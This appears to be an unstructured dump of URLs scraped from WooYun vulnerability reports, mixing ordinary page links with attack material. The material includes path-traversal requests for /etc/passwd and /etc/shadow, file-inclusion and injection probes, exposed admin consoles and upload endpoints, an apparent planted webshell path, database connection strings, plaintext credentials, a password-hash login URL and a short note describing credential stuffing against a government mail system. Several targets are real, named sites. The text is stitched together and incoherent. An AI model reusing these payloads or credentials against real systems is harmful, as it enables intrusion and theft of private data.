http://**.**.**.**/kxpjindex.php?id=18 http://item.ccidnet.com/index.php 
http://mtrack.hexun.com/track/hcstock.php?task=registeruser&userid=25863150&username=mail98318187&deviceuid=355136055562691&devicetoken=03551360555626910000001034000001&status=active&pushbadge=enabled http://www.hanzify.org/?Go=Show::List&ID=9417 http://xsc.jhun.edu.cn/bys/login.asp www.ticket2010.com http://www.goldmail.cn/document/online/news_detail.php?ID=118 http://bbs.88.com.cn/uc_server/.svn/entries http://**.**.**.**/admin http://**.**.**.**/newsshow.asp?id=528&classid=tp http://bi.cisg.cn/biportal/index.jsp http://wpm.haier.net/ http://wpm.haier.net/ci/ jdbc:oracle:thin:@**.**.**.**:1521:sgwy http://**.**.**.**/bugs/wooyun-2015-0124167 http://**.**.**/SystemManage/User/usernameys.aspx_ http://**.**.**/SystemManage/User/usernameys.aspx_ http://**.**.**/SystemManage/User/usernameys.aspx_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/HumanResources/WorkTime/MyAttendance.aspxtype=1_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/CRMtable/UserInfo_pm.aspxtmp=_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**/YuSuan/Shenpi/Jiekuan/JiekuanSp.aspx_ http://**.**.**//MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/MyWork/Metting/MynetMetting.aspxp=22_ http://**.**.**//MyWork/Metting/MynetMetting.aspxp=22 http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ 
http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**/CRMtable/Shengchang/Wangong/Wangong.aspxp=80_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx_ http://**.**.**//WorkFlow/WorkFlowList_ywt.aspx http://**.**.**.**/gzsg/),phpcms http://zhaopin.digitalchina.com/Outer/default.aspx http://pk.tom.com/web/flashplay.do?action=pkgame&from=danji&gameid=1&type=2&uid=1&userid= http://**.**.**.**/announcement.php?id=118 http://**.**.**.**/youyuan/winlist.jsp?awardid=370 http://www.sino-life.com/SL_MAS/mas/SinolifeApp.apk?pub=1&publicAccountId=000&platform=01 chrome://downloads/#upload的上传功能引用了 http://115.com/static/browser/download/js/upload.js chrome://downloads/#upload http://la.lenovo.com.cn/ http://act.2144.cn/week/?id=6 http://tangyuan.tom.com/redeem/ http://tangyuan.tom.com/redeem/tom_ecardExchang http://sqlmap.org https://**.**.**.**/search?utf8=✓&q=rongbei http://www.job168.com/schools/school.jsp?school_no=27720302 http://data.liba.com/phpmyadmin/ http://data.liba.com/pma/ http://passport2.chaoxing.com/login2 http://passport2.chaoxing.com/pwd/pwdreset?uid=xxxxxxxx&refer=http://cqcet.fy.chaoxing.com&code=1cb790xxx7214f39b08c03036321axxx http://**.**.**.**/lzygg/Zixun_show.aspx?id=1 http://auth.10jqka.com.cn/server-status http://admin.1jiajie.com/v2/index.php http://admin.1jiajie.com/v2/index.php?action=login http://wooyun.org/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095。 Service.asmx/paybilllogin https://**.**.**.**/hcsoft/lijiang-xinnonghe/blob/faf58fc9425d79ae384b25ddc8a818893a855c70/document/dizhi.txt https://**.**.**.**/hcsoft/lijiang-xinnonghe/tree/master/document http://**.**.**.**/ExPodDnloadCk.asp?ACT=11C http://**.**.**.**/sfs3/modules/fixed/fixedview.php?id=1656 http://**.**.**.**/sfs3/modules/fixed/fixedview.php?id=51 
http://**.**.**.**/sfs3/modules/fixed/fixedview.php?id=849 http://**.**.**.**/sfs3/modules/book/booksay.php?sel=1 http://**.**.**.**/sfs3/modules/book/booksay.php?sel=1 http://**.**.**.**/sfs3/modules/book/booksay.php?sel=1 http://**.**.**.**/sfs3/modules/docup/doc_download.php?docup_id=188 http://**.**.**.**/sfs3/modules/magazine/magazine.php?book_num=5&chap=9 http://**.**.**.**/sfs3/modules/magazine/magazine.php?book_num=9&chap=16 http://**.**.**.**/sfs3/modules/magazine/magazine.php?book_num=6&chap=94 http://**.**.**.**/sfs3/modules/news/profile.php?msg_id=8153 http://**.**.**.**/sfs3/modules/news/profile.php?msg_id=12 http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand http://m.job168.com/schools/show.jsp?photo_no=1&school_no=5165102 http://**.**.**.**/ http://**.**.**.**/imap/index/detail_template?id=1673 http://**.**.**.**/bugs/wooyun-2015-0103197、http://**.**.**.**/bugs/wooyun-2015-0122495上述白帽子提交的是旅游门户建站系统,专门用于建站、提供各种功能等。而本次提交的是专门的订票系统类似一款插件形式,单一的站点。并且案例均不一样! http://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz http://**.**.**.**/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../etc/passwd%00 inurl:prod_detail.php?item_id= inurl:prod_detail.php?item_id= http://**.**.**.**/site_item_content_3.php?site_map_item_id=210 http://**.**.**.**/nursery/site_item_content_3.php?site_map_item_id=368 http://**.**.**.**/site_item_content_3.php?site_map_item_id=26 http://**.**.**.**/huide_hosp/big5/site_item_content_3.php?site_map_item_id=68 http://**.**.**.**/site_item_content_3.php?site_map_item_id=12 http://**.**.**.**/tw/site_item_content_3.php?site_map_item_id=21 http://**.**.**.**/site_item_content_3.php?site_map_item_id=11 http://**.**.**.**/site_item_content_3.php?site_map_item_id=355 http://**.**.**.**/site_item_content_3.php?site_map_item_id=138 http://**.**.**.**/e_paper/epaper.php?main_id=28 http://**.**.**.**/e_paper/epaper.php?main_id=5 
http://**.**.**.**/e_paper/epaper.php?main_id=32 http://**.**.**.**/e_paper/epaper.php?main_id=1 http://**.**.**.**/e_paper/epaper.php?main_id=9 http://**.**.**.**/e_paper/epaper.php?main_id=1 http://**.**.**.**/e_paper/epaper.php?main_id=38 http://**.**.**.**/e_paper/epaper.php?main_id=11 http://**.**.**.**/e_paper/epaper.php?main_id=5 http://**.**.**.**/tuningwork-shop/e_paper/epaper.php?main_id=16 http://**.**.**.**/e_paper/epaper.php?main_id=1 http://**.**.**.**/en/prod_detail.php?item_id=369 http://**.**.**.**/prod_detail.php?item_id=322 http://**.**.**.**/prod_detail.php?item_id=30 http://**.**.**.**/kuangtai/eng/prod_detail.php?item_id=31 http://**.**.**.**/e-shop/prod_detail.php?item_id=13 http://**.**.**.**/prod_detail.php?item_id=7 http://**.**.**.**/eng/prod_detail.php?item_id=106 http://**.**.**.**/ch/prod_detail.php?item_id=28 http://**.**.**.**/tw/prod_detail.php?item_id=42 http://**.**.**.**/en/prod_detail.php?item_id=9 http://**.**.**.**/tw/prod_detail.php?item_id=9 http://**.**.**.**/prod_detail.php?item_id=73 http://**.**.**.**/prod_list.php?series_id=1 http://**.**.**.**/prod_list.php?series_id=74 http://**.**.**.**/prod_list.php?series_id=16 http://**.**.**.**/prod_list.php?series_id=136 http://**.**.**.**/prod_list.php?series_id=16 http://**.**.**.**/cn/prod_list.php?series_id=6 http://**.**.**.**/tw/prod_list.php?series_id=29 http://**.**.**.**/prod_list.php?series_id=6 http://**.**.**.**/prod_list.php?series_id=17 http://**.**.**.**/ch/prod_list.php?series_id=7 http://**.**.**.**/prod_list.php?series_id=2 http://**.**.**.**/prod_list.php?series_id=7 http://**.**.**.**/goyou/prod_list.php?series_id=7 http://**.**.**.**/site_item_content_4.php?site_map_item_id=45 http://**.**.**.**/nursery/site_item_content_4.php?site_map_item_id=800 http://**.**.**.**/huide_hosp/big5/site_item_content_4.php?site_map_item_id=89 http://**.**.**.**/site_item_content_4.php?site_map_item_id=151 http://**.**.**.**/site_item_content_4.php?site_map_item_id=54 
http://**.**.**.**/site_item_content_4.php?site_map_item_id=586 http://**.**.**.**/site_item_content_4.php?site_map_item_id=29 http://**.**.**.**/site_item_content_4.php?site_map_item_id=34 http://202.110.133.46:90/IDWebSoft/ http://wooyun.org/bugs/wooyun-2015-0141288,我们已经可以整理出如下用户的账号信息: http://**.**.**.**:9002/console http://**.**.**.**:9002/jmxroot/jmxroot.jsp jdbc:oracle:thin:@**.**.**.**:1521:wwora50 http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/m=order.orderBook&member_phone=1_ http://**.**.**/line/list-0-0-0-0-0-1.html_ lhttp://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/line/list-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html_ http://**.**.**/view/list-0-0-0-0-0-0-1.html http://**.**.**.**/happy/index.asp http://**.**.**.**/happy/chkuser.asp https://**.**.**.**/fpwd/index.html?t=e&u=关键码 https://**.**.**.**/fpwd/index.html?t=e&u=aJNpbZll http://**.**.**.**/zwgkClass.aspx?id=1 sqlmap:sqlmap http://**.**.**.**/lds/sys_toLogin.do,账号admin/123456 http://**.**.**.**//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd http://**.**.**.**//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/shadow http://crm.aili.com/login.php?goto=%2Fserver.php%3Fm%3Dindex http://**.**.**.**/smenu.php?menu=file:///etc/issue%00&rand=456581210&sid= http://**.**.**.**:7001细节:http://**.**.**.**/bugs/wooyun-2014-065752 http://**.**.**.**/ http://**.**.**.**/pages/login.aspx http://**.**.**.**/pages/Login.aspx 
http://**.**.**.**:8090/login.php?Lang=../../../../../../../../../../etc/passwd%00.htm&cmd=form http://w.panpom.com/index.php?cid=10&act=aboutus.aboutus http://www.vcanbio.com/academiccenterdetail.aspx?id=1 http://**.**.**.**/news_detail.asp?n_id=129 http://**.**.**.**/ http://**.**.**.**:9003/superadmin/adminLogin.action cn:8085 http://**.**.**.**/ http://**.**.**.**/bugs/wooyun-2015-0141209/trace/3789f61a7765dbc4f4a4c7d1b04e6095 http://220.181.168.22/login.jsp http://**.**.**.**/,郑州市人力资源与社会保障局邮件系统,登陆处可撞库,用常用用户名和弱口令123456可获得一个有效账号,进入后可查看全局通讯录,爬取所有用户名,再去撞,获得7个账号,登入可查看大量内部敏感信息。 http://**.**.**.**/ http://**.**.**.**/messager/users.data http://account.sogou.com/act/gettoken?userid=jjcsyd@sogou.com&password=7fd56fc81302c18e69132a813aab09bc&appid=1044&livetime=3600&authtype=1 http://www.yonglibao.com http://www.yonglibao.com:80/ D198C8E88D6B833153575AB4256B93C2:FG=1 www.yonglibao.com http://**.**.**.**:82/login.asp?searchyw=1&gjjxxcxyhlx=0 http://**.**.**.**:82/main.asp http://**.**.**.** http://**.**.**.** http://**.**.**.** http://ServerName/web-console/管理后台无限制访问 http://ServerName/invoker/JMXInvokerServlet通过接口可以上传webshell,这里只测试了获取系统版本和系统名 jdbc:oracle:thin:@**.**.**.**:1521:sdlss http://**.**.**.**/如图所示 http://**.**.**.**:8089/buyer/makeorder.asp?purchasebill_id=18215,如图所示: http://60.191.25.162:7003/login.jsp http://60.191.25.162:7003/console/ http://60.191.25.162:7003/ma/ma3.jsp jdbc:oracle:thin:@192.168.55.187:1521:orcl http://**.**.**.**/ http://**.**.**.**/NewsSys/ShowNews.aspx?nid=303 http://**.**.**.**/NewsSys/ShowNews.aspx?nid=303 http://**.**.**.**/NewsSys/ShowNews.aspx?nid=303 jdbc:oracle:thin:@**.**.**.**:1522:ora11g http://**.**.**.**/inavadmin/file/default.aspx文件管理器存在任意文件上传漏洞。 http://itweb.didichuxing.com/_layouts/15/viewlsts.aspx www.lppz.com/24 http://www.sure56.com/bindselect.asp? 
http://www.sure56.com http://wapi.hexun.com/Api_picList.cc?pid=132138528&pc=20&pn=1 http://**.**.**.**/和http://**.**.**.**/ http://**.**.**.**/user/login下拉栏可转到不同子站 http://**.**.**.**/user/login http://**.**.**.**/为例 http://**.**.**.**/Admin/fileManage.aspx?action=LIST&value1=~%2Fadmin%2F&value2= http://**.**.**.**/Admin/fileManage.aspx?action=LIST&value1=~%2F&value2= http://**.**.**.**/Admin/fileManage.aspx?action=NEWDIR&value1=~%2Fsoft%2Fwooyun http://**.**.**.**/Admin/fileManage.aspx?action=DELETE&value1=~%2Fsoft%2Fwooyun https://github.com/yeyingcai/soft/blob/d9cdf45598b778662e905e54e774832a4922914a/qssec_local_settings_product.py coding:utf8 http://wooyun.org/bugs/wooyun-2015-0138128 http://120.203.214.96/xsgj/index.jsp http://www.letv.com/ptv/vplay/23174476.html http://api.mob.app.letv.com/play?vid=23174476 http://g3.letv.cn/vod/v2/MTc2LzIzLzkzL2xldHYtdXRzLzE0L3Zlcl8wMF8yMi0zMjM5ODY0MjMtYXZjLTQ3NTY4OS1hYWMtMzIwMDEtNjk3MDQxNy00NDk5NDgxNTctNmQ2MTU4MzA2N2FjMGQ2Mzc3OGMwOTQ3NTBmZjBlM2QtMTQzNzk3MTg2OTMxNy5tcDQ=?b=516&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&platid=3&splatid=302&playid=0&tss=no&vtype=13&cvid=1576692383917&payff=1&pip=00d5b40bb977e724401eb25fe303c2f8&format=1&sign=mb&dname=mobile&expect=3&tag=mobile http://122.72.111.116/176/23/93/letv-uts/14/ver_00_22-323986423-avc-475689-aac-32001-6970417-449948157-6d61583067ac0d63778c094750ff0e3d-1437971869317.letv?crypt=63aa7f2e234&b=516&nlh=3072&nlt=45&bf=36&p2p=1&video_type=mp4&termid=0&tss=no&geo=CN-31-412-3&platid=3&splatid=302&its=0&qos=5&proxy=1972482332,2051544247,467484324&keyitem=rxWmhiz4nvsenbC4B_PU1Ho7JhJWOKmfhaz0NA..&ntm=1442350800&nkey=41a6034d60e7dd335ffa49e11f0a917e&nkey2=edab82ab0b281b7a61c84c2f0f7d6c43&enckit=1&mltag=1&mmsid=33649179&tm=1442332453&key=af2e4f83d633ef3ac96c12aa40c07e4c&playid=0&vtype=13&cvid=1576692383917&payff=1&sign=mb&dname=mobile&tag=mobile&errc=0&gn=163&buss=4701&cips=222.60.109.51 http://service.sanhao.com/login.php 
http://123.57.18.112/mysqladmin/index.php http://gongyi.homelink.com.cn/lianjia/portal/user/loginHtml http://sy.crland.com.cn/admin@manager/login.php http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**:8090/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/PublicModule/MessageManage/Iframe_StuSend.aspx?cid=0801&pid=2010 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**:8090/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/VJ/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/PublicModule/MessageManage/Iframe_Admin.aspx?did=01 http://**.**.**.**/ http://**.**.**.**/query.jsp?status=0&tuid=1%27%22 http://data.1jiajie.com:80/ www.acunetix-referrer.com http://report.mail.fund123.cn/login.aspx http://report.mail.fund123.cn/main.aspx?companyid=phfund这样就可以登录任意基金公司的账号,规则是这样子滴:companyid="基金名称首字母"+fund。先看看鹏华基金的。 site:doyouhike.net http://www.tjtou.cn/page/website/infonews/list?classid=26* site:bpzykh.com inurl:info https://account.shfft.com/member/pwd/find http://www.cdyushun.com/bigclass.aspx?bigcc=29 http://www.firstworldsec.com.hk/FirstWorldSec_aspx/DailyMsg/viewDailyMsg.aspx?ID=1804&LangId= http://**.**.**.**/yiyun/security/toLogin.action http://**.**.**.**/index.php/News/cate.html?pid=124 http://kjxy.xijing.edu.cn/about.php?id=14 
http://gljsx.xijing.edu.cn/newsbrow.asp?stype=%E9%99%A2%E7%B3%BB%E5%85%AC%E5%91%8A&type=%E6%96%B0%E9%97%BB%E5%85%AC%E5%91%8A&id=1529 http://oa.szahotel.com/ https://ssl.tujia.com https://ssl.tujia.com/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media https://ssl.tujia.com/vpnweb/userfiles/media/cmd.php http://**.**.**.** URL:http://js.medejob.com/jobseeker/stage/FAQ_Question.aspx?class=1 www.hlitong.com http://www.hlitong.com:80/ www.hlitong.com http://**.**.**.**/comp/showPerson.aspx?U=yuzhechen http://**.**.**.**/bugs/wooyun-2010-0120323 http://**.**.**.**/ http://**.**.**.**:7001/hrss/ELTextFile.load.d?src=../../ierp/bin/prop.xml http://**.**.**.**:8081/tools/SWFUpload/upload.jsp http://**.**.**.**:8081/tools/SWFUpload/upload.jsp http://**.**.**.**:8081/tools/SWFUpload/upload.jsp height:20px;BORDER http://zabbix.emar.com/zabbix/zatree/graph.php?hostid=10716 http://**.**.**.**:8080/servlet/FileUploadServlet?fileName=../WEB-INF/proxool.xml http://**.**.**.**/news_list/&newsCategoryId=6.html http://**.**.**/_ http://www.namex.cn/HomeLink/OrderList.aspx http://www.namex.cn/HomeLink/OrderLocate.aspx?id=3213059 http://**.**.**.**/ http://**.**.**.**/posts.php?type=../../../../../../../etc/passwd http://**.**.**.**/posts.php?type=../../../../../../../etc/passwd http://**.**.**.**/print/examregist.aspx?bmid=64576 http://**.**.**.**/print/examregist.aspx?bmid=14576 http://**.**.**.**/print/examregist.aspx?bmid=94576一样有数据 http://**.**.**.**/print/examregist.aspx?bmid=104576 http://cos.sto.cn:89/manager/install/welcome.jsp http://cos.sto.cn/messager/users.data http://cos.sto.cn/login/Login.jsp?logintype=1 http://cos.sto.cn:89/m1/login.do http://cos.sto.cn:89/m1/login.do?message=Login.nouser http://cos.sto.cn:89/m1/login.do?message=Login.pswerror http://cos.sto.cn:89/m1/home.do http://**.**.**.**/bugs/wooyun-2015-0132559 http://pk.tom.com:80/ http://**.**.**.**:8080/x5/portal/login.w http://www1.kugou.com/user/NLoginChenck_1.aspx 
jdbc:oracle:thin:@**.**.**.**:1521:orcl HH24:mi:ss jdbc:kingbase://localhost:54321/egov HH24:mi:ss jdbc:oracle:thin:@localhost:1521:orcl jdbc:mysql://localhost:13306/egov jdbc:mysql**.**.**.**:13306/egov http://106.187.48.88:9000/admin/products/ http://mail.qiye.163.com/ http://i.auto.sohu.com/user/login/toLogin.at http://**.**.**.**/bugs/wooyun-2010-0123791 http://bug.raiyi.com/my/page http://61.63.13.7/console http://61.63.81.162/console http://61.63.81.162/wls_Server/a.jsp http://m.f.hualongxiang.com:80/view/index/id/2022692 http://**.**.**.**/bugs/wooyun-2010-0115213 http://zabbix.emar.com/zabbix/hostinventories.php?hostid=10451&sid=42605b251c2bee09 http://app.cnfol.com/dataapi/index.php/welcome/hkthpj/205/6/1/id/asc/point_1+/point_2/ http://**.**.**.**/ http://**.**.**.**/console是进不去后台的,只能用http://**.**.**.**:80/console,这是因为做了虚拟主机的原因 http://**.**.**.**:8006/shownews.asp?id=267 http://**.**.**.**:8006/admin/login.asp http://www.ubestchoice.com/newsDetail.php?tid=13&id=28 http://mail.i-vpoints.com zl.zhu/111111 http://**.**.**.**//Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**:100/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://**.**.**.**/Login.aspx?Role=author http://cly.njtech.edu.cn/admin_login.htm http://www.liba.com/m/ http://weixin.wxcrg.com.cn/xapp/login.jsp http://www.bjsto.cn/index.aspx?menuid=3&type=introduct&lanmuid=1&language=cn http://**.**.**.**/cn/detail_t.aspx?Class_ID=86'报错,泄漏sql和绝对路径 http://www.daimayi.com/index.php/Strategy/index/cate_id/2 http://fs.job168.com/df/index.jsp?title= http://hz.job168.com/df/index.jsp?title= http://jm.job168.com/df/index.jsp?title= 
http://sz.job168.com/df/index.jsp?title= http://zs.job168.com/df/index.jsp?title= http://zh.job168.com/df/index.jsp?title= http://dg.job168.com/df/index.jsp?title= http://qy.job168.com/df/index.jsp?title= http://train.job168.com/df/index.jsp?title= http://e.job168.com/df/index.jsp?title= http://job168.com/df/index.jsp?title= http://hrm.job168.com/df/index.jsp?title= http://hz.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://dg.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://zh.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://english.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://hrm.job168.com/paper/e_show.jsp?issue_no=279&page_name=B1&photo=photo_thumb http://fs.job168.com/train/train_organ.jsp?unit_no=3484202 http://sz.job168.com/train/train_organ.jsp?unit_no=3484202 http://qy.job168.com/train/train_organ.jsp?unit_no=3484202 http://zs.job168.com/train/train_organ.jsp?unit_no=3484202 http://dg.job168.com/train/train_organ.jsp?unit_no=3484202 http://train.job168.com/train/train_organ.jsp?unit_no=3484202 http://jqrc.job168.com/train/train_organ.jsp?unit_no=3484202 http://jnjs.job168.com/train/train_organ.jsp?unit_no=3484202 http://english.job168.com/train/train_organ.jsp?unit_no=3484202 http://job168.com/train/train_organ.jsp?unit_no=3484202 http://e.job168.com/train/train_organ.jsp?unit_no=3484202 http://hrm.job168.com/train/train_organ.jsp?unit_no=3484202 http://e.job168.com/train/searchresult.jsp?course_type=A0000 http://hrm.job168.com/train/searchresult.jsp?course_type=A0000 http://fs.job168.com/schools/pdetail.jsp?talent_no=4743579 http://jm.job168.com/schools/pdetail.jsp?talent_no=4743579 http://sz.job168.com/schools/pdetail.jsp?talent_no=4743579 http://sz.job168.com/schools/school.jsp?school_no=26932302 http://qy.job168.com/schools/school.jsp?school_no=26932302 http://dg.job168.com/schools/school.jsp?school_no=26932302 
http://zs.job168.com/schools/school.jsp?school_no=26932302 http://www.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://zh.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://dg.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://zs.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://hz.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://jm.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://sz.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://fs.job168.com/schools/pos.jsp?talent_no=4743579&unit_no=&school_no=27006302 http://fs.job168.com/schools/show.jsp?school_no=26932302&photo_no=1 http://www.job168.com/schools/news.jsp?info_no=81 http://fs.job168.com/schools/news.jsp?info_no=81 http://hz.job168.com/schools/news.jsp?info_no=81 http://sz.job168.com/schools/news.jsp?info_no=81 http://dg.job168.com/schools/news.jsp?info_no=81 http://qy.job168.com/schools/news.jsp?info_no=81 http://zh.job168.com/schools/news.jsp?info_no=81 http://english.job168.com/person/ceping2012/show_new.jsp?talent_no= http://english.job168.com/paper/e_show.jsp?issue_no=279&page_name= http://e.job168.com/paper/e_show.jsp?issue_no=279&page_name= http://hrm.job168.com/paper/e_show.jsp?issue_no=279&page_name= http://job168.com/paper/e_show.jsp?issue_no=279&page_name= http://**.**.**.**/ls/sp/agentLogin?syskey_request_token=230fc4e2bdc703833b5262b1c7c06493 http://**.**.**.**/jhy/searchAction!search.action http://**.**.**.**/formguide/upload_field.php?uploadtext=wenjian&formid=2&fieldid=58&type=file http://www.hnrczpw.com/gposinfo/freejobs/ztzph http://**.**.**.**/fzb.rar http://**.**.**.**/wwwroot.rar http://**.**.**.**/newsdetail.php?id=DAFAC525-FF42-448D-AC3D-430F5D132AEF&menuid=41&modelid=4 http://**.**.**.**/tu.php?id=42957 ftp://202.108.145.182 
http://**.**.**.**/jeeTest/a/bmd/VisDataDef/getVisData?datacode= http://**.**.**.**/sites/main/preview/fb.htm?tid=20140612033900515653364&col_id=17 http://**.**.**.**/admin/newstext.asp?id=524 http://**.**.**.**/login http://**.**.**.**/upload/files/1/a664151e8fcc415fa123fb076b72986d.jsp encap:Ethernet MTU:1500 packets:21969710 packets:3847409 txqueuelen:1000 http://**.**.**.**/c6v32/Jhsoft.Web.login/PassWordSlide.aspx http://**.**.**.** URL:http://mail.cqmu.edu.cn/ http://y1s.cn/index.php?g=admin&m=index&a=mainPage http://**.**.**.**/Skins/Books.aspx?n_lx=7&ParentID=7 http://**.**.**.**/detailNews.jsp?NewsID=2786 http://api.social-touch.com/log/ http://www.crp-md.com/ http://www.crp-md.com:82/FCKeditor/editor/filemanager/connectors/test.html http://job.itpub.net http://job.itpub.net http://mail.bfa.edu.cn/ http://drops.wooyun.org/tips/2031) http://**.**.**.**/index.php/News/search index.php/News/search http://**.**.**.** http://ykt.nchu.edu.cn/pages/xxfb/editor/uploadAction.action http://**.**.**.**/passport/login.aspx http://**.**.**.**/bugs/wooyun-2010-0580 http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1299811948810295&channelcode=A01030303_ http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1241681874944282&channelcode=A011403_ http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1317343604713782&channelcode=A07170505_ http://**.**.**/cms/cms/infopub/getclick.jspinfoid=1408523683056826&channelcode=A13010402_ http://**.**.**/cms/wcmforum/forummain.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/forummain.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/forummain.jspwebappCode=A01&forumName=%CA%D0%C3%F1%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/grouplist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/grouplist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ 
http://**.**.**/cms/wcmforum/manage/grouplist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/userlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/userlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/userlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/boardlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/boardlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3_ http://**.**.**/cms/wcmforum/manage/boardlist.jspwebappCode=A01&forumName=%BD%BB%C1%F7%C2%DB%CC%B3 http://ocm.itpub.net/ http://ocm.itpub.net/test.php http://wb.yili.com/solr/#/ http://**.**.**.**/site/login http://api.inewsweek.cn/api/api.ring_value_show.php?ring_id=253 http://sqlmap.org http://ci.hotwater.com.cn:80/ci/apps/sys/AccountAction.do?emp_Code=e&method=forgetPassWord http://**.**.**.**/about.php?lanmu=3&id=1 http://**.**.**.**/Data/ http://**.**.**.**/phpmyadmin/ http://**.**.**.**/dzsw/viewOrder.ashx?order_id=20150916000001 